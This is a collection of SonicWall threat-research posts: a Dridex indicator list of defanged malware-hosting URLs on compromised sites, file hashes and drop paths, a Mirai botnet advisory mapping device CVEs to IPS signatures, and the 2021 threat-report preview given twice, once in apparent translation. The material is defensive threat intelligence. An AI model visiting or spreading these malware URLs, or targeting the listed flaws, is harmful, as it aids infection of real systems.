  • https://askcon[.]net/wp-includes/SimplePie/Content/Type/0lOzUuHLScUH[.]php
  • https://crm[.]sgdatapos[.]com/modules/goals/language/bulgarian/vdOwNUr2yXh[.]php
  • https://lweonepal[.]com/wp-content/cache/object/013/bFPs28xfQyOe[.]php
  • https://triplonet[.]com[.]br/__MACOSX/wp-includes/js/codemirror/3Uqzx5RTyl8pT[.]php
  • https://casagrandecontabil[.]com[.]br/vo/vfm-admin/images/avatars/1Wu2EdUfRb3q7Zu[.]php
  • https://ppdb[.]smp1sbw[.]sch[.]id/ro-plugins/ckeditor/skins/moono-lisa/767884gnQIu[.]php
  • https://blog[.]garantitorna[.]com/wp-includes/css/dist/block-directory/j9nCiyCAcJQDh3[.]php
  • https://dikan[.]co[.]za/wsz2SCI6sU6k6o[.]php
  • https://elearn[.]empoweredmw[.]com/lib/minify/matthiasmullie-minify/data/WD3Uawo4EEZ[.]php
  • https://equiposautomotriz[.]com/wp-includes/Requests/Exception/HTTP/U997eIiQSqs3[.]php
  • https://familystory[.]es/wp-content/uploads/2021/01/InOm7e9u4vMmW[.]php
  • https://fortgem[.]co[.]uk/wp-includes/css/dist/block-directory/Pk57G2yz[.]php
  • https://sproca[.]tg/wp-content/themes/agronomics-lite/css/nj6N9LQhADNC[.]php
  • https://tarifacabins[.]com/wp-includes/js/mediaelement/renderers/KcsChOSuEV[.]php
  • https://gesky[.]co[.]tz/wp-includes/sodium_compat/namespaced/Core/HMJi1PQC[.]php
  • https://birkett[.]com[.]au/include/Base/Modules/Filter/KZyRSXJtoC[.]php
  • https://dentaldesignstudiowi[.]com/wp-content/uploads/2021/01/9eFsntMZ[.]php

SHA256 of Dridex payload:

  • a095a0ec3cd1655bbabad3f3b2e996521444c93dc51f1e78af878bfef3fd3ca8
  • c190c5a25b2616a4a0c4965d5f83cc47e47f2d2e4d2cab2c8987dcc29db290a3

Dropped Files:

  • %appdata%\<random>.xsl
  • C:\windows\Temp\<random>.dll

Tipping Point: SonicWall’s New Report Records a Surge in Threats and a Historic Paradigm Shift

Cybersecurity is a dynamic field in which new attack vectors appear every year; the targets change and cybercrime techniques are refined.

But few years have brought the changes we saw in 2020.

The year was marked by two historic events: the COVID-19 pandemic and the SolarWinds supply-chain attack. The first caused a transformation so profound that it changed something as essential as the way we work. The second struck the IT world at its heart, triggering a chain reaction that affected thousands of companies and revealing a type of breach that is practically immune to any existing defense.

Meanwhile, cybercriminals refined their tactics, using cloud-based tools to take threats to new levels. In many cases the victims were precisely the people least equipped to counter the risks: remote workers unaware of the risks that exist outside the corporate perimeter, overstretched healthcare facilities, and schools and universities busy transitioning to distance learning.

SonicWall Capture Labs researchers monitored these profound changes in real time and collected their findings in the 2021 SonicWall Cyber Threat Report. Here is a preview of what they discovered:

Ransomware Reaches a New Record

Record Bitcoin prices fueled the dizzying rise in ransomware: SonicWall recorded a 62% increase in ransomware attempts over the previous year.

Particularly worrying was the number of attempts based on Ryuk, a new and rapidly growing ransomware family that continues to develop new capabilities, as well as a sharp increase in the volume of attacks on the healthcare sector.

Patented RTDMI Technology Is More Effective Than Ever

In 2020, SonicWall’s Real-Time Deep Memory Inspection™ (RTDMI) technology discovered 268,362 ‘never-before-seen’ malware variants, up 74% over the previous year. Beyond the essential capability of blocking unknown mass-market malware in real time, RTDMI can mitigate devastating side-channel attacks, such as the recently discovered attack exploiting vulnerabilities in Apple’s M1 chips.

IoT Malware Up 66%

The number of IoT devices has been growing for years, but the COVID-19 pandemic accelerated this trend, pushing the number of attacks to 56.9 million, a 66% increase over 2019. This spike was even larger in North America, where attacks rose by 152%.

Cryptojacking Continues Without Coinhive

Bitcoin was not the only cryptocurrency to soar in 2020: Monero prices also rose, pushing cryptojacking to its highest level in three years. However, predictions of cryptojacking’s demise were not entirely wrong: browser-based cryptojacking showed a significant decline, although the number of file-based cryptojacking attempts is still considerable.

Intrusion Attempts Rise, Attack Patterns Change

In 2020, intrusion attempts recorded an overall increase of 112%, but the nature of these attacks changed. Directory Traversal attacks went from 21% to 34% of the total volume of malicious attempts, while RCE attacks lost momentum, falling from 21% to 16%.

Critical Vulnerabilities Of Network Security Devices Being Utilized By Mirai Botnet Malware

The SonicWall Capture Labs Threat Research team has received reports about a new Mirai botnet malware targeting network security devices. The Mirai botnet malware attack involves many different brands of connected network security devices that are affected by critical vulnerabilities. The following vulnerabilities are involved:

  • CVE-2020-25506: D-Link DNS-320 firewall exploit
  • CVE-2021-27561: Yealink Device Management remote code-execution (RCE)
  • CVE-2021-27562: Yealink Device Management remote code-execution (RCE)
  • CVE-2020-26919: Netgear ProSAFE Plus exploit
  • CVE-2021-22502: Micro Focus Operation Bridge Reporter RCE
  • CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution (RCE)
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability

On March 16, 2021, SonicWall Capture Labs Threat Research team released the following signatures to protect against such attacks:

  • CVE-2020-25506
    IPS:15455 D-Link DNS-320 system_mgr.cgi Command Injection
  • CVE-2021-27561/CVE-2021-27562
    IPS:15456 Yealink DM Remote Code Execution
  • CVE-2021-22502
    IPS:15457 Micro Focus Operations Bridge Reporter Command Injection
  • CVE-2019-19356
    IPS:15458 Netis WF2419 netcore_set.cgi Remote Code Execution
  • VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
    This is an old vulnerability. SonicWall released the patch for this vulnerability in 2015. There are also existing signatures detecting it:
    IPS:5603 GNU Bash Code Injection (CVE-2014-6271) 2
    IPS:13064 GNU Bash Code Injection (CVE-2014-6278)
  • GAV signatures to cover malware samples:
    GAV: Mirai.LL
    GAV: Mirai.LL_1

 

Tipping Point: SonicWall Exposes Soaring Threat Levels, Historic Power Shifts In New Report

Cybersecurity is a dynamic field, and each year brings the introduction of new attack vectors, shifts in favored targets, and refinements in cybercriminal techniques.

But very few years have brought the sort of change we saw in 2020.

“2020 offered a perfect storm for cybercriminals and a critical tipping point for the cyber arms race,” said SonicWall President and CEO Bill Conner in the official announcement. “The pandemic — along with remote work, a charged political climate, record prices of cryptocurrency, and threat actors weaponizing cloud storage and tools — drove the effectiveness and volume of cyberattacks to new highs. This latest threat intelligence offers a look at how cybercriminals shifted and refined their tactics, painting a picture of what they are doing amid the uncertain future that lies ahead.”

The year was bookended by two historic events: the COVID-19 pandemic and the SolarWinds supply-chain attack. The former brought disruption so deep it succeeded in changing something as basic as the very way we do work. The latter struck the IT world to its core, setting off a chain reaction that would impact thousands of businesses, pulling back the curtain on a type of breach impervious to virtually all existing defenses.

In between, cybercriminals ramped up their efforts, weaponizing cloud-based tools and driving many threat vectors to new levels. Too often, their prey consisted of those least equipped to bear it — remote workers unaware of the risks that exist outside the corporate perimeter, overwhelmed healthcare facilities, and schools and universities struggling to make the transition to remote learning.

SonicWall Capture Labs threat researchers were on hand to track these seismic shifts in real time, and we’ve compiled their insights in the 2021 SonicWall Cyber Threat Report. Here’s a preview of what they discovered:

Ransomware Sets New Record

Record highs in the price of Bitcoin helped push ransomware to new heights: SonicWall recorded a 62% year-over-year increase in the number of ransomware attempts.

Of particular concern was the number of attempts involving Ryuk, a newer but rapidly growing ransomware family that continues to gain new capabilities, as well as a sharp increase in the number of attacks on the healthcare industry.

Patented RTDMI More Formidable Than Ever

In 2020, SonicWall’s Real-Time Deep Memory Inspection™ (RTDMI) technology discovered 268,362 ‘never-before-seen’ malware variants, up 74% year-over-year. While the ability to block unknown mass-market malware in real time is crucial, RTDMI can also mitigate devastating side-channel attacks, such as the recently discovered attack affecting Apple M1 chips.

IoT Malware Jumps 66%

The number of IoT devices has been on the rise for years, but the COVID-19 pandemic accelerated this trend, pushing the number of attacks up to 56.9 million — a 66% increase over 2019. In North America, this spike was even more pronounced: attacks there rose a staggering 152%.

Cryptojacking Carries On Without Coinhive

Bitcoin wasn’t the only form of cryptocurrency to skyrocket in 2020: Monero prices also rose, helping to push cryptojacking to a three-year high. Predictions of cryptojacking’s demise weren’t completely off base, however: Browser-based cryptojacking did show a significant drop, though the amount of file-based cryptojacking attempts more than made up for it.

Intrusion Attempts Rise, Attack Patterns Change

2020 saw malicious intrusion attempts jump 112% overall — but the nature of these attacks also changed. Directory Traversal attempts jumped from 21% to 34% of total malicious attempts, while RCE attempts lost steam, falling from 21% to 16%.